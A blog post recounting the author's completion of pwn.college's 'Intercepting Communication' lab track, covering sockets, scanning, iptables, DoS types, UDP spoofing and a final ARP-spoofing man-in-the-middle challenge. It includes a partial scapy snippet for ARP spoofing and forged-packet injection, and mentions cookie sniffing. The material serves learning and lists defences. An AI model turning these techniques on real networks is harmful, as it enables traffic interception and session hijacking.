DEV Community

Hitanshu Gedam
Hitanshu Gedam

Posted on

Intercepting Communication on pwn.college's Intro to Cybersecurity Dojo

#beginners #cybersecurity #networking #programming

Introduction

I recently completed pwn.college's "Intercepting Communication" track inside Intro to Cybersecurity dojo, a series of challenges that took me from the basics of socket programming to executing a full man-in-the-middle (MITM) attack. This post documents what I learned and how each challenge built upon the last.

Phase 1: The Basics of Network Communication

Connect, Send, Shutdown, Listen

These initial challenges taught me the fundamentals of socket programming:

  • Connect: Establishing TCP connections to remote hosts
  • Send: Transmitting data over established connections
  • Shutdown: Properly closing connections (half-closed vs. fully closed)
  • Listen: Creating a server that accepts incoming connections

The key insight was understanding the TCP state machine and how shutdown() differs from close() - shutdown() allows graceful half-closed connections while close() tears down the entire socket.

Scan 1 & 2: Port Scanning

These challenges introduced me to network reconnaissance:

  • TCP Connect scanning vs. SYN scanning
  • Understanding service identification through banner grabbing
  • Handling timeouts and connection refusals

I learned that a SYN scan (nmap -sS) is faster and stealthier than a full TCP connect scan because it never completes the handshake.

Monitor 1 & 2: Traffic Analysis

Using tcpdump and Wireshark, I learned to:

  • Capture packets with filters (host, port, tcp)
  • Analyze TCP flags (SYN, ACK, RST, FIN)
  • Identify suspicious patterns in network traffic

The tshark command became my best friend: tshark -r capture.pcap -Y "tcp.flags.syn == 1"

Sniffing Cookies

This was my first taste of how dangerous unencrypted traffic can be. By sniffing HTTP traffic, I could extract session cookies and impersonate users. This drove home why HTTPS is essential for any authentication.

Phase 2: Network Control

Network Configuration

Understanding IP addressing, subnet masks (/24, /16), routing tables, and default gateways. The ip command replaced the deprecated ifconfig in my toolkit.

Firewall 1, 2, 3

These challenges taught iptables:

  • Firewall 1: Basic filtering (ACCEPT/DROP rules)
  • Firewall 2: Stateful inspection (tracking established connections)
  • Firewall 3: NAT and port redirection

Key rules I learned:

iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
Enter fullscreen mode Exit fullscreen mode

Denial of Service 1, 2, 3

These challenges demonstrated various DoS attack vectors:

  1. SYN flood: Exhausting connection queues with incomplete handshakes
  2. UDP flood: Overwhelming bandwidth with stateless packets
  3. Application layer attacks: Slowloris-style attacks keeping connections open

Mitigation techniques included SYN cookies, rate limiting, and connection timeouts.

Phase 3: Protocol Deep Dive

Ethernet

Understanding MAC addresses, ARP, and the data link layer. The Ethernet frame structure (destination MAC, source MAC, EtherType, payload, FCS) became second nature.

IP

IPv4 header dissection: version, IHL, TOS, total length, identification, flags, fragment offset, TTL, protocol, checksum, source/destination addresses. The TTL field's role in preventing routing loops was particularly interesting.

TCP

The Transmission Control Protocol's reliability mechanisms:

  • Sequence and acknowledgment numbers
  • Windowing and flow control
  • Retransmission and timeout handling

TCP Handshake

The three-way handshake (SYN, SYN-ACK, ACK) and four-way teardown (FIN, ACK, FIN, ACK). I learned to craft handshake packets using scapy and observe state transitions.

UDP

Connectionless, unreliable, but fast. UDP's simplicity makes it ideal for DNS, DHCP, and streaming. No handshake means lower latency but no delivery guarantees.

UDP Spoofing 1-4

These challenges escalated in complexity:

  1. Basic spoofing: Forging source IP addresses
  2. Response spoofing: Injecting fake replies
  3. Amplification attacks: Using UDP's stateless nature for reflection attacks (e.g., DNS amplification)
  4. Sequence prediction: While harder with UDP, understanding how to craft valid responses

Phase 4: The Big Leagues

ARP

The Address Resolution Protocol maps IP addresses to MAC addresses. Its stateless, trust-based nature makes it vulnerable to spoofing. I learned to send gratuitous ARP replies and how arp -a can reveal the ARP cache.

Intercept

This challenge required passive interception - capturing traffic between two hosts without modifying it. Using tcpdump or scapy in promiscuous mode, I learned to sniff packets not destined for my MAC address.

Man-in-the-Middle

The final boss. Here's what I executed:

# ARP spoofing to redirect traffic
arp_spoof = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
send(arp_spoof, loop=1, inter=2)

# Packet interception and modification
def process(pkt):
    if pkt[Raw].load == b"command: ":
        # Forge a response with "flag" instead of "echo"
        forged = IP(src=pkt[IP].dst, dst=pkt[IP].src) / TCP(...) / Raw(b"flag")
        send(forged)
Enter fullscreen mode Exit fullscreen mode

The breakthrough came when I realized I didn't need IP forwarding - with ARP spoofing and active packet injection, I could intercept and modify traffic directly.

Key Takeaways

  1. Network security is layered - vulnerabilities at any layer (ARP at L2, IP at L3, TCP/UDP at L4) can compromise higher layers.

  2. Trust is dangerous - ARP, UDP, and even TCP sequence numbers (in older implementations) rely on trust that can be abused.

  3. Encryption isn't optional - Many challenges (especially Sniffing Cookies) showed why plaintext protocols are unacceptable.

  4. Tools are powerful - scapy for packet crafting, tcpdump for capture, iptables for firewall rules, nmap for scanning.

  5. Defense requires depth - A single countermeasure isn't enough. ARP spoofing is mitigated by static ARP entries, DAI, and network segmentation.

Final Thoughts

This track transformed how I see network traffic. Every packet tells a story - who's talking, what they're saying, and whether we can trust them. The MITM challenge pulled everything together: I had to understand ARP to redirect traffic, TCP to maintain sequence/ack numbers, packet crafting to forge responses, and protocol analysis to know when to inject.

For anyone learning network security, I can't recommend pwn.college enough. These challenges are well-designed, progressive, and brutally educational.

All challenges completed on pwn.college's platform. Thanks to the Arizona State University team for creating such an excellent learning resource.

Top comments (0)